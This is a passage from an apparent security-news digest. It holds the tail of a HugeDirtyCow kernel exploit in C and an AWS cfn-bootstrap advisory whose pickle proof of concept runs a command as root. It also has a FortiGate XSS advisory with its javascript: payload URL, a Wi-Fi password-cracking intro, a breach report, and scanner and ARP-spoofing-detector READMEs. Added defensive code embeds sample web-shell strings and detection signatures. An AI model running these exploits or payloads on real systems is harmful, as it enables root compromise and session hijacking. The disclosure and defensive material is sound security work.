        lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);
        madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.
        write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);
    }

    return NULL;
}

void *wait_for_success(struct thread_args *args)
{
    while (args->thp_chk_map[args->off] != MEMESET_VAL) {
        madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);
        sched_yield();
    }

    args->stop = 1;

    return NULL;
}

int main()
{
    struct thread_args args;
    void *thp_chk_map_addr;
    int ret = -1; // Non-zero until the race actually runs, so early error paths report failure.

    // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.
    args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (args.thp_map == MAP_FAILED) {
        perror("[!] mmap()");
        return -1;
    }
    if (args.thp_map != MAP_BASE) {
        fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n");
        goto err_unmap1;
    }

    printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map);

    thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge
    args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (args.thp_chk_map == MAP_FAILED) {
        perror("[!] mmap()");
        goto err_unmap1;
    }
    if (args.thp_chk_map != thp_chk_map_addr) {
        fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n");
        goto err_unmap2;
    }

    ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE);
    ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);
    if (ret) {
        perror("[!] madvise()");
        goto err_unmap2;
    }

    args.buf_to_write = malloc(PAGE_SIZE);
    if (!args.buf_to_write) {
        perror("[!] malloc()");
        ret = -1;
        goto err_unmap2;
    }
    memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);

    args.mem_fd1 = open("/proc/self/mem", O_RDWR);
    if (args.mem_fd1 < 0) {
        perror("[!] open()");
        ret = -1;
        goto err_free;
    }

    args.mem_fd2 = open("/proc/self/mem", O_RDWR);
    if (args.mem_fd2 < 0) {
        perror("[!] open()");
        ret = -1;
        goto err_close1;
    }

    printf("[*] Racing. Gonna take a while...\n");

    args.off = 0;
    // Overwrite every single page
    while (args.off < MAP_SIZE) {
        pthread_t threads[3];

        args.stop = 0;
        ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);
        ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);
        ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);
        if (ret) {
            perror("[!] pthread_create()");
            goto err_close2;
        }

        pthread_join(threads[0], NULL); // This call will return only after the overwriting is done
        pthread_join(threads[1], NULL);
        pthread_join(threads[2], NULL);

        args.off += PAGE_SIZE;
        printf("[*] Done 0x%lx bytes\n", args.off);
    }

    printf("[*] Success!\n");

err_close2:
    close(args.mem_fd2);
err_close1:
    close(args.mem_fd1);
err_free:
    free(args.buf_to_write);
err_unmap2:
    munmap(args.thp_chk_map, MAP_SIZE);
err_unmap1:
    munmap(args.thp_map, MAP_SIZE);

    if (ret) {
        fprintf(stderr, "[!] Exploit failed.\n");
    }

    return ret;
}

     Source: https://github.com/bindecy/HugeDirtyCowPOC
  11. masc A malware (web) scanner developed during CyperCamp Hackathon 2017 About homepage PyPI Features Scan any website for malware using OWASP WebMalwareScanner checksum and YARA rules databases Perform some cleaning operations to improve website protection Monitor the website for changes. Details are written in a log file Custom website support Scan your site to know if it has been infected with some malware List your local backups Logging support Backup your site Restore website WordPress support Scan your site to know if it has been infected with some malware Scan for suspect files and compare with a clean installation Clean up your site to avoid giving extra information to attackers Backup your site (to recover later if you need) List your local backups Logging support Restore website Requirements First of all, notice that this tool is developed under Linux and, at the moment, it has been tested only under this Operating System Python >= 3 Some Python libraries python-magic yara-python watchdog termcolor santi@zenbook:$ pip3 install python-magic yara-python watchdog termcolor Notice masc is developed under Linux and it has not been tested under any other Operating System. Anyway, it should run without problems under any Unix-friendly OS. In particular, in Mac OSX I have noticed it's neccesary to install Homebrew to use python-magic library propery as _libmagic. Check first the previous link to the brew homepage and then you will be able to install as I show below: santi@zenbook:$ brew install libmagic Installtaion To install masc on your computer, you can download a release, untar it and try. 
You can also install it using pip ('pip3 install masc')

Usage

    masc 0.1 (http://github.com/sfaci/masc)
    usage: masc.py [-h] [--add-file FILENAME] [--add-word STRING] [--clean-cache]
                   [--clean-site] [--list-backups] [--list-logs] [--make-backup]
                   [--monitor] [--name NAME] [--rollback] [--scan PATH]
                   [--site-type {wordpress,drupal,custom}]

    optional arguments:
      -h, --help            show this help message and exit
      --add-file FILENAME   Add a suspect file to the dictionary
      --add-word STRING     Add a suspect content to the dictionary
      --clean-cache         Clean masc cache (cache and logs files, NO backups)
      --clean-site          Clean up the site to hide information to attackers
      --list-backups        List local backups
      --make-backup         Create a local backup of the current installation
      --monitor             Monitor site to detect changes
      --name NAME           Name assigned to the scanned installation
      --rollback            Restore a local backup
      --scan PATH           Scan an installation at the given PATH
      --site-type {wordpress,drupal,custom}
                            which type of web you want to scan:: wordpress, joomla, drupal or magento

Test

There is a repository in the Docker Hub to perform tests: masc-wordpress

Documentation

You can find a complete tutorial about how to use masc in the wiki.

Thanks

Thanks to OWASP WebMalwareScanner for some ideas and the signatures databases with checksums and YARA rules (and how to load it to work with).

Author

Santiago Faci santiago.faci@gmail.com

Download: masc-master.zip or git clone https://github.com/sfaci/masc.git

Source: https://sfaci.github.io/masc/
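The two operations the README lists, a checksum/signature scan and change monitoring, reduced to their core as an added example. This is not masc's own code: masc loads the OWASP WebMalwareScanner checksum database and YARA rules, whereas the known-bad checksum and the two byte-pattern "rules" below are constructed for the demo, as is the sample site built under a temporary directory.

```python
"""Added example (not masc's own code): a minimal checksum-and-signature
scanner with a baseline-diff monitor. The known-bad checksum, the content
signatures and the sample site are constructed for the demo."""
import hashlib
import os
import tempfile

# Constructed "signature database": the SHA-256 of one invented web shell and
# two byte patterns standing in for YARA rules.
BAD_SAMPLE = b"<?php eval(base64_decode($_POST['c'])); ?>"
KNOWN_BAD_SHA256 = {hashlib.sha256(BAD_SAMPLE).hexdigest()}
CONTENT_SIGNATURES = {
    "php_eval_b64": b"eval(base64_decode(",
    "php_passthru_request": b"passthru($_REQUEST",
}


def sha256_file(path):
    """Stream the file through SHA-256 so large uploads are not read into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_file(path):
    """Findings for one file: ("checksum", sha256) and/or ("signature", rule name)."""
    findings = []
    digest = sha256_file(path)
    if digest in KNOWN_BAD_SHA256:
        findings.append(("checksum", digest))
    with open(path, "rb") as fh:
        data = fh.read()
    for name, pattern in CONTENT_SIGNATURES.items():
        if pattern in data:
            findings.append(("signature", name))
    return findings


def _walk(root):
    """Yield (relative path with '/' separators, absolute path) for every file."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), full


def scan_tree(root):
    """Map each suspicious file under root to its findings."""
    report = {}
    for rel, full in _walk(root):
        findings = scan_file(full)
        if findings:
            report[rel] = findings
    return report


def snapshot(root):
    """Baseline for change monitoring: relative path -> SHA-256."""
    return {rel: sha256_file(full) for rel, full in _walk(root)}


def diff_snapshots(old, new):
    """Classify what changed since the baseline was taken."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def build_demo_site():
    """Constructed sample site: a clean index.php and a web shell under uploads/."""
    root = tempfile.mkdtemp(prefix="masc-demo-")
    os.makedirs(os.path.join(root, "wp-content", "uploads"))
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'clean'; ?>")
    with open(os.path.join(root, "wp-content", "uploads", "shell.php"), "wb") as fh:
        fh.write(BAD_SAMPLE)
    return root


def run_demo():
    """Scan, take a baseline, simulate tampering, then diff and rescan."""
    root = build_demo_site()
    report = scan_tree(root)
    baseline = snapshot(root)
    with open(os.path.join(root, "index.php"), "ab") as fh:
        fh.write(b"\n<?php passthru($_REQUEST['x']); ?>")   # injected backdoor
    with open(os.path.join(root, "dropper.php"), "wb") as fh:
        fh.write(b"<?php /* new file */ ?>")
    delta = diff_snapshots(baseline, snapshot(root))
    rescan = scan_tree(root)
    return report, delta, rescan
```

`run_demo()` returns the first scan (only the web shell is flagged, by both checksum and signature), the diff after tampering (index.php modified, dropper.php added) and the rescan, which now also flags index.php through the passthru signature. A real baseline would be written to disk with the log, as masc does, rather than held in memory.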
  12. aws-cfn-bootstrap versions prior to 1.4-22.14 suffer from a local code execution vulnerability.

aws-cfn-bootstrap local code execution as root
==============================================

The latest version of this advisory is available at:
https://sintonen.fi/advisories/aws-cfn-bootstrap-local-code-execution-as-root.txt

Overview
--------

AWS EC2 instances deployed with the AWS CloudFormation bootstrap contain a vulnerable daemon that enables an attacker to execute arbitrary code as root.

Description
-----------

The aws-cfn-bootstrap `cfn-hup` daemon contains a local code execution vulnerability. A non-privileged attacker with the capability to write files (either locally or remotely) can write a specially crafted file which will result in arbitrary code execution as root.

Impact
------

The non-privileged attacker is able to execute arbitrary commands as the administrative user (root). This leads to complete loss of confidentiality, integrity and availability.

Details
-------

The discovered vulnerability, described in more detail below, enables multiple independent attacks, described here in brief:

Local Arbitrary Code Execution As Root
--------------------------------------

A local user can overwrite or replace a file with specially crafted contents that result in code execution as root. The code execution is limited to local users, unless a remotely accessible service contains an arbitrary file write vulnerability, in which case the combined result is remote code execution as root.

Information Leak
----------------

A local user can read the metadata_db file. This file typically contains cleartext passwords and other similar confidential information. The confidential data is exposed to local users, but if a remotely accessible service contains an arbitrary file read vulnerability, the information is exposed to external attackers as well.
[CVE-2017-9450] Incorrect Permission Assignment for Critical Resource (CWE-732)
-------------------------------------------------------------------------------

The `cfn-hup` daemon of the `aws-cfn-bootstrap` package is running with umask 0. This happens because /opt/aws/bin/cfn-hup does not set a secure umask for the `DaemonContext` class of the `python-daemon` package:

    with daemon.DaemonContext(pidfile=pidlockfile.TimeoutPIDLockFile('/var/run/cfn-hup.pid', 300), signal_map={signal.SIGTERM : kill}):

The `python-daemon` package defaults to a umask of 0 as seen in https://pagure.io/python-daemon/blob/master/f/daemon/daemon.py :

    `umask`
        :Default: ``0``

        File access creation mask ("umask") to set for the process on
        daemon start.

        A daemon should not rely on the parent process's umask value,
        which is beyond its control and may prevent creating a file with
        the required access mode. So when the daemon context opens, the
        umask is set to an explicit known value.

        If the conventional value of 0 is too open, consider setting a
        value such as 0o022, 0o027, 0o077, or another specific value.
        Otherwise, ensure the daemon creates every file with an
        explicit access mode for the purpose.

Any file or directory created by the daemon will thus use the mask as specified by the `mkdir` or `open` functions.

The code in /usr/lib/python2.7/dist-packages/cfnbootstrap/update_hooks.py does the following:

    def _create_storage_dir(self):
        if os.name == 'nt':
            self.storage_dir = os.path.expandvars(r'${SystemDrive}\cfn\cfn-hup\data')
        else:
            self.storage_dir = '/var/lib/cfn-hup/data'

        if not os.path.isdir(self.storage_dir):
            log.debug("Creating %s", self.storage_dir)
            try:
                os.makedirs(self.storage_dir)

Since `os.makedirs` defaults to mode 777 the resulting directories /var/lib/cfn-hup and /var/lib/cfn-hup/data will have permissions 777 (`rwxrwxrwx`), that is, the directories are world-writable.
The CFN hook processing code reads the file `metadata_db` with the Python `shelve` module:

    def process(self):
        with contextlib.closing(shelve.open('%s/metadata_db' % self.dir)) as shelf:
            self._resource_cache = {}
            for hook in self.hooks:
                try:
                    self._process_hook(hook, shelf)

And:

    def _process_hook(self, hook, shelf):
        try:
            new_data = self._retrieve_path_data(hook.path)
        except InFlightStatusError:
            return

        old_data = shelf.get(hook.name + "|" + hook.path, None)

The `shelve` module comes with a fat warning about possible arbitrary code execution:

> Warning: Because the shelve module is backed by pickle, it is insecure to load a shelf from an untrusted source. Like with pickle, loading a shelf can execute arbitrary code.

Since any user can write to the /var/lib/cfn-hup/data/metadata_db file and the `cfn-hup` daemon is running as root, any user can execute arbitrary commands as root.

A proof of concept exploit:

    #!/usr/bin/env python
    import os
    import shelve

    class E(object):
        def __reduce__(self):
            return (os.system, ('id >/pwned',))

    s = shelve.open('/var/lib/cfn-hup/data/metadata_db')
    for k in s.keys():
        s[k] = E()
    s.close()

The vulnerable code is executed every 15 minutes, so on average it takes 450 seconds for the exploit to get triggered. The exploit is also executed when the daemon is started (for example at system boot).

Reproducing
-----------

1. Sign in to AWS.
2. From AWS Console "Management Tools" select "CloudFormation".
3. Select "Create Stack".
4. Select eg. the template "LAMP Stack".
5. Fill the relevant fields. Note to select the EC2 keypair to use for access.
6. Leave other options as-is.
7. Click "Create".
8. Once running, ssh to the box with the EC2 keypair as `ec2-user`.
9. Upload the PoC to the host and execute it.
10. Wait at most 15 minutes for the /pwned file to appear.
Vulnerable instances
--------------------

Any AWS EC2 instance that has been deployed with a CloudFormation template that has the aws-cfn-bootstrap package 1.4-15.9.amzn1 and at least one hook included (for example `cfn-auto-reloader-hook`). This includes, but is not limited to, the AWS CloudFormation default LAMP, Rails and WordPress templates. Hooks with the `on.command` trigger don't result in code execution. Some earlier versions of aws-cfn-bootstrap might also have had this vulnerability for `on.command` triggers.

The history of this vulnerability and affected package versions are unclear, but the vulnerability is believed to have existed at least since 2011. As such the number of vulnerable systems could be high.

Recommendations to vendor
-------------------------

1. In aws-cfn-bootstrap `cfn-hup` command set the `DaemonContext` umask to 077.
2. For existing installations, run `chmod -R go-rwx /var/lib/cfn-hup` as root.

End user mitigation
-------------------

1. Upgrade aws-cfn-bootstrap to 1.4-22.14.amzn1 or later
2. chmod -R go-rwx /var/lib/cfn-hup

Credits
-------

This vulnerability was discovered by Harry Sintonen / F-Secure Corporation.

Timeline
--------

05.04.2017 spotted the 'rwxrwxrwx' directories, suspected a vulnerability
08.04.2017 found a way to exploit the vulnerability, wrote the PoC exploit
08.04.2017 wrote a preliminary advisory
19.04.2017 minor adjustments
03.05.2017 some fixes and clarifications
03.05.2017 reported to aws-security@amazon.com
04.05.2017 received response from the aws security team
12.05.2017 requested status of the issue
18.05.2017 requested status of the issue
25.05.2017 requested status of the issue
25.05.2017 received response: "appropriate actions are being taken"
01.06.2017 requested status of the issue
06.06.2017 received a response: "a fix has been built, and will be deployed in the coming couple of weeks."
06.06.2017 requested CVE from MITRE
06.06.2017 MITRE assigned CVE-2017-9450
13.06.2017 forwarded the CVE number to aws-security@amazon.com
26.07.2017 AWS released a fix as ALAS-2017-861 - https://alas.aws.amazon.com/ALAS-2017-861.html
26.07.2017 notified AWS security about the incomplete fix: umask is still 0, leading to RCE as root via other vectors. sent a new proof of concept exploit utilizing such new vector
04.08.2017 AWS released an updated ALAS-2017-861 fix, fixing the vulnerability. the daemon umask is still 0 resulting in potential information disclosure or code execution vulns
14.09.2017 AWS released a fix to the umask issue as ALAS-2017-895 - https://alas.aws.amazon.com/ALAS-2017-895.html
29.11.2017 public release of the advisory

Source: https://packetstormsecurity.com/files/145177/awscfnbootstrap-exec.txt
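The advisory's two recommendations, an explicit daemon umask and owner-only permissions on /var/lib/cfn-hup, turned into code as an added example. This is not part of the advisory and not aws-cfn-bootstrap's code: it creates the shelf directory with an explicit mode rather than inheriting the umask, and refuses to unpickle a shelf whose directory or file is writable by anyone but the running user, which is the condition that made `metadata_db` attacker-controlled. The temporary paths and the hook key used in the demo are constructed.

```python
"""Added example, not part of the advisory or of aws-cfn-bootstrap: the two
controls recommended above applied to a shelve-backed state file. The state
directory is created with an explicit owner-only mode instead of inheriting
the process umask (umask 0 plus os.makedirs() is what produced rwxrwxrwx),
and a shelf is refused unless its directory and file are owned by the
running user and writable by nobody else, because shelve is pickle
underneath. Paths and the hook key below are constructed for the demo."""
import os
import shelve
import stat
import tempfile

GROUP_OR_OTHER_WRITABLE = stat.S_IWGRP | stat.S_IWOTH


def create_storage_dir(path):
    """Create the state directory 0700 regardless of the inherited umask."""
    old_umask = os.umask(0o077)
    try:
        os.makedirs(path, mode=0o700, exist_ok=True)
    finally:
        os.umask(old_umask)
    os.chmod(path, 0o700)          # makedirs masks its mode with the umask; be explicit
    return path


def is_private_to_me(path):
    """True if path is a non-symlink owned by this uid and not group/other writable."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode) or st.st_uid != os.geteuid():
        return False
    return not (st.st_mode & GROUP_OR_OTHER_WRITABLE)


def open_shelf_safely(storage_dir, name="metadata_db"):
    """Open the shelf only if nobody else could have written it.

    Raises PermissionError otherwise; treat that as a tampering signal, never
    fall back to an unchecked shelve.open().
    """
    if not is_private_to_me(storage_dir):
        raise PermissionError("state directory %s is not private" % storage_dir)
    base = os.path.join(storage_dir, name)
    # The dbm backend may store the shelf as name, name.db or name.dat/name.dir.
    for candidate in (base, base + ".db", base + ".dat", base + ".dir"):
        if os.path.lexists(candidate) and not is_private_to_me(candidate):
            raise PermissionError("state file %s is not private" % candidate)
    return shelve.open(base)


def demo():
    """Constructed scenario: reject a 777 directory, accept a freshly created 700 one."""
    os.umask(0o077)                # recommendation 1: the daemon sets its own umask
    root = tempfile.mkdtemp(prefix="cfn-hup-demo-")
    loose = os.path.join(root, "loose")
    os.makedirs(loose)
    os.chmod(loose, 0o777)         # what the vulnerable daemon produced
    try:
        open_shelf_safely(loose)
        loose_rejected = False
    except PermissionError:
        loose_rejected = True

    tight = create_storage_dir(os.path.join(root, "data"))
    with open_shelf_safely(tight) as shelf:
        shelf["cfn-auto-reloader-hook|/etc/cfn/cfn-hup.conf"] = {"version": 1}
    with open_shelf_safely(tight) as shelf:
        stored = dict(shelf)
    return loose_rejected, stat.S_IMODE(os.stat(tight).st_mode), stored
```

The permission check is a detective control layered on the preventive one: even with the umask fixed, a `chmod` by an operator or a packaging mistake would otherwise silently reopen the pickle path. A stricter design would also stop using shelve for the hook cache and persist it as JSON, which has no code-execution path on load.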
  13. FortiGate SSL VPN Portal versions 5.6.2 and below, 5.4.6 and below, 5.2.12 and below, and 5.0 and below suffer from a cross site scripting vulnerability.

=======================================================================
              title: FortiGate SSL VPN Portal XSS Vulnerability
            product: Fortinet FortiOS
 vulnerable version: see: Vulnerable / tested versions
      fixed version: see: Solution
         CVE number: CVE-2017-14186
             impact: Medium
           homepage: https://www.fortinet.com
              found: 2017-10-02
                 by: Stefan Viehböck (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Montreal - Moscow
                     Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"From the start, the Fortinet vision has been to deliver broad, truly integrated, high-performance security across the IT infrastructure. We provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our unique security fabric combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html

Vulnerability overview/description:
-----------------------------------
The FortiGate SSL VPN Portal is prone to a reflected cross-site scripting (XSS) vulnerability. The HTTP GET parameter "redir" is vulnerable.

An attacker can exploit this vulnerability by tricking a victim into visiting a URL. The attacker is able to hijack the session of the attacked user, and use this vulnerability in the course of spear-phishing attacks, e.g. by displaying a login prompt that sends the victim's credentials back to the attacker.
Note: This vulnerability is also an open redirect and is very similar to a vulnerability that was fixed in FortiOS in March 2016 (FG-IR-16-004).
https://www.fortiguard.com/psirt/fortios-open-redirect-vulnerability

Proof of concept:
-----------------
The following request exploits the issue:

https://vpn.<SERVER>.com/remote/loginredir?redir=javascript:alert(%22XSS%20%22%2Bdocument.location)

The server responds with a page that looks as follows:

---------------------------------------------------------------------------------------------------
<html><head>
<script language="javascript">
document.location=decodeURIComponent("javascript%3Aalert%28%22XSS%20%22%2Bdocument.location%29");
</script>
</head></html>
---------------------------------------------------------------------------------------------------

Vulnerable / tested versions:
-----------------------------
FortiOS 5.6.0 -> 5.6.2
FortiOS 5.4.0 -> 5.4.6
FortiOS 5.2.0 -> 5.2.12
FortiOS 5.0 and below

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242

Vendor contact timeline:
------------------------
2017-10-02: Contacting vendor through psirt@fortinet.com
2017-10-03: Vendor confirms vulnerability, assigns CVE-2017-14186. Expected fix in version 5.6.3
2017-11-23: Vendor provides update
2017-11-29: Coordinated public release of advisory

Solution:
---------
FortiOS 5.6 branch: Upgrade to upcoming 5.6.3 (ETA: November 27th)
FortiOS 5.4 branch: Upgrade to 5.4.6 special build (*) or upcoming 5.4.7 (ETA Dec 7th)
FortiOS 5.2 branch: Upgrade to 5.2.12 special build (*) or upcoming 5.2.13 (ETA: Dec 14th)

More information can be found at:
https://fortiguard.com/psirt/FG-IR-17-242

Workaround:
-----------
Not available.

# 0day.today [2017-12-04] #
Source: 0day.today
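The page above decodes the `redir` parameter and writes it straight into `document.location`, so a `javascript:` URL becomes script execution and any absolute URL becomes an open redirect. The check that was missing, as an added example that is not Fortinet's code: the redirect target is validated server-side before it is emitted, accepting only a path on the portal's own origin or an absolute URL on an assumed host (`vpn.example.com`), with a constructed default landing page. The first test input is the advisory's own PoC parameter value.

```python
"""Added example, not Fortinet code: validating a post-login redirect target
before it is placed into document.location, the step the vulnerable
loginredir page skipped. own_host and the default landing page are assumed
values."""
from urllib.parse import unquote, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def safe_redirect_target(redir, own_host="vpn.example.com", default="/remote/index"):
    """Return a redirect target safe for document.location, or `default`.

    Accepted: a path on this origin starting with '/', or an absolute http(s)
    URL whose host is exactly own_host. Rejected: any other scheme
    (javascript:, data:, vbscript:), scheme-relative //host, backslash
    tricks, control characters, and percent-encoded variants of all of these.
    """
    if not isinstance(redir, str) or not redir.strip():
        return default
    # Decode once, because the page itself ran decodeURIComponent() on the
    # value; a check on the raw string would miss javascript%3A....
    candidate = unquote(redir).strip()
    if any(ord(ch) < 0x20 for ch in candidate):
        return default              # "java\tscript:" style scheme splitting
    if "\\" in candidate:
        return default              # browsers treat /\host as //host
    parts = urlsplit(candidate)
    if parts.scheme:
        if parts.scheme not in ALLOWED_SCHEMES:     # urlsplit lower-cases it
            return default
        if parts.netloc.lower() != own_host.lower():
            return default          # open redirect, or user@host spoofing
        return candidate
    if parts.netloc or candidate.startswith("//"):
        return default              # scheme-relative URL to another host
    if not candidate.startswith("/"):
        return default              # unanchored relative targets are ambiguous
    return candidate
```

Host comparison is exact on purpose: `vpn.example.com@evil.example` and `vpn.example.com:8443` are both rejected, and anything the validator cannot prove safe lands on the default page rather than being passed through. Emitting the result as an HTTP `Location` header instead of inline script removes the XSS sink entirely; the validator still matters there because of the open-redirect half of the bug.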
  14. A weak password is one that is short, common, or easy to guess. Equally bad are secure but reused passwords that have been lost by negligent third-party companies like Equifax and Yahoo. Today, we will use Airgeddon, a wireless auditing framework, to show how anyone can crack bad passwords for WPA and WPA2 wireless networks in minutes or seconds with only a computer and network adapter.

To follow this guide, you'll need a wireless network adapter capable of monitor mode and packet injection. You will also need a computer capable of running VirtualBox, an open-source hypervisor, software that can create and run multiple virtual machines. This should be easy since VirtualBox has downloads for Windows, macOS, and Linux.

You can also download a copy of Parrot Security OS (aka ParrotSec) to run in VirtualBox if you'd like everything to work like in our video guide below. If you want to download the ParrotSec ISO but you'd also like to stay off any NSA lists, you can always use a proxy server to download the image file while hiding your IP address.

If you're already set up on Arch or Kali Linux, you can also install Airgeddon and any dependencies following the directions on GitHub, and then follow along. One thing to note: Airgeddon needs to open other windows to work, so this won't work via SSH (Secure Shell), only VNC (Virtual Network Computing) or with a screen.

As you can see in the video above, a WPA handshake can be grabbed in seconds, leaving the strength of your password as your last line of defense. If this can't stand up to a reasonable assault, your data is as good as gone if an attacker decides to knock on the door of your network.

If you're looking for some help, there are plenty of ways to prevent yourself from being easy to attack with this method. Never reuse passwords, and always make sure to use secure passwords hackers won't like.
Password managers like LastPass also allow you to create and sync secure passwords that are much harder to brute-force. Lastly, never share your Wi-Fi password when you don't need to, and change it regularly if you have to share your password at all.

Thanks for watching, please subscribe to Null Byte on YouTube for more content, and happy cracking!

Source: https://null-byte.wonderhowto.com/how-to/video-crack-weak-wi-fi-passwords-seconds-with-airgeddon-parrot-os-0181434/
  15. Global e-commerce business PayPal has disclosed a data breach that may have compromised personally identifiable information for roughly 1.6 million customers at a payment processing company PayPal acquired earlier this year.

PayPal Holdings Inc. said Friday that a review of its recently acquired company TIO Networks showed evidence of unauthorized access to the company's network, including some confidential parts where the personal information of TIO's customers and customers of TIO billers was stored.

Acquired by PayPal for US$233 million in July 2017, TIO Networks is a cloud-based multi-channel bill payment processor and receivables management provider that serves the largest telecom, wireless, cable and utility bill issuers in North America.

PayPal did not clarify when or how the data breach took place, nor did it reveal details about the types of information stolen by the hackers, but the company did confirm that its own platform and systems were not affected by the incident.

The data breach in TIO Networks was discovered as part of an ongoing investigation for identifying security vulnerabilities in the payment processing platform. As soon as PayPal identified unauthorized access to TIO's network, PayPal took action by "initiating an internal investigation of TIO and bringing in additional third-party cybersecurity expertise to review TIO's bill payment platform," PayPal's press release [PDF] reads.

The company has begun working with the companies it services to notify potentially affected customers. Besides notifying them, the company is also working with a consumer credit reporting agency, Experian, to provide free credit monitoring memberships for fraud and identity theft to those affected by the breach.

To protect its customers, TIO has also suspended its services until a full-scale investigation into the incident is completed.
Since the investigation is ongoing, PayPal will communicate with TIO customers and merchant partners directly as soon as the company has more details on the incident. Also, the affected customers will be directly contacted by the company. Via thehackernews.com
  16. arp-validator

Security Tool to detect arp poisoning attacks

Features

Uses a faster approach in detection of arp poisoning attacks compared to passive approaches
Detects not only presence of ARP Poisoning but also valid IP-MAC mapping (when LAN hosts are using non-customized network stack)
Stores validated host for speed improvements
Works as a daemon process without interfering with normal traffic
Logs to any external file

Architecture

    +-------------+               +---------------+                   +------------+
    | ARP packet  |  ARP Reply    | Mac-ARP Header|    Consistent     |   Spoof    |
    |   Sniffer   | ------------> |  consistency  | ----------------> |  Detector  |
    |             |   Packets     |    Checker    |   ARP Packets     |            |
    +-------------+               +---------------+                   +------------+
                                          |                                /
                                          | Inconsistent                  /
                                          | ARP Packets         Spoofed  /
                                          |                  ARP Packets /
                                          V                             /
                                  +--------------+                     /
                                  |              |                    /
                                  |   Notifier   | <-----------------
                                  |              |
                                  +--------------+

1. Arp Packets Sniffer

It sniffs all the ARP packets and discards:
    ARP Request packets
    ARP Reply packets sent by the machine itself which is using the tool (assuming the host running the tool isn't ARP poisoning)

2. Mac-ARP Header Consistency Checker

It matches:
    the source MAC address in the MAC header with the one in the ARP header
    the destination MAC address in the MAC header with the one in the ARP header
If either of the above doesn't match, it will be notified.

3. Spoof Detector

It works on the basic property of the TCP/IP stack. The network interface card of a host will accept packets sent to its MAC address, broadcast address and subscribed multicast addresses. It will pass on these packets to the IP layer. The IP layer will only accept IP packets addressed to its IP address(es) and will silently discard the rest of the packets. If the accepted packet is a TCP packet it is passed on to the TCP layer. If a TCP SYN packet is received then the host will either respond back with a TCP SYN/ACK packet if the destination port is open or with a TCP RST packet if the port is closed.
So there can be two types of packets:

    RIGHT MAC - RIGHT IP
    RIGHT MAC - WRONG IP (Spoofed packet)

For each consistent ARP packet, we construct a TCP SYN packet with the destination MAC and IP address as advertised by the ARP packet, some random TCP destination port, and the source MAC and IP address of the host running the tool. If a RST (port is closed) or ACK (port is listening) is received for the SYN within TIME LIMIT, the host (which sent the ARP packet) is legitimate. Otherwise no response is received within TIME LIMIT, so the host is not legitimate and it will be notified.

4. Notifier

It provides desktop notifications in case of ARP spoofing detection.

Installation

npm

source

    git clone https://github.com/rnehra01/arp-validator.git
    cd arp-validator
    npm install

Use the binary in bin/ to run

Usage

    [sudo] arp-validator [action] [options]

actions:

    start       start arp-validator as a daemon

        options:
            --interface, -i   Network interface on which tool works
                              arp-validator start -i eth0 or --interface=eth0
            --hostdb, -d      stores valid hosts in external file (absolute path)
                              arp-validator start -d host_file or --hostdb=host_file
            --log, -l         generate logs in external files (absolute path)
                              arp-validator start -l log_file or --log=log_file

    stop        stop arp-validator daemon
    status      get status of arp-validator daemon

global options:

    --help, -h    Displays help information about this script
                  'arp-validator -h' or 'arp-validator --help'
    --version     Displays version info
                  arp-validator --version

Dependencies

libpcap-dev: library for network traffic capture
node-pcap/node_pcap
stephenwvickers/node-raw-socket
indutny/node-ip
scravy/node-macaddress
codenothing/argv
niegowski/node-daemonize2
mikaelbr/node-notifier

Issues

Currently, it is assumed that hosts are using a non-customized network stack, hence the malicious host won't respond to the TCP SYN packet.
But in case the malicious host is using a customized network stack, it can directly capture the TCP SYN packet from layer 2 and respond with a self-constructed TCP RST or ACK, hence our tool will validate the malicious host.

If a host is using a firewall which allows TCP packets for only some specific ports, a legitimate host also won't respond to the TCP SYN packet and the tool will give a false positive of ARP poisoning detection.

References

Vivek Ramachandran and Sukumar Nandi, "Detecting ARP Spoofing: An Active Technique"

Source: https://github.com/rnehra01/arp-validator
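The three detection stages described above (reply filtering, MAC-header versus ARP-header consistency, and the active SYN probe), run over constructed Ethernet/ARP frames as an added example. This is not arp-validator's code (the tool is Node.js on libpcap); it is a Python re-statement of the same logic. The SYN probe needs a raw socket and a live network, so here it is an injected callable and the demo substitutes a fake one; every MAC and IP address is made up.

```python
"""Added example, not code from arp-validator: stages 1-3 of the pipeline in
the README, run over constructed Ethernet/ARP frames. Stage 3 needs a raw
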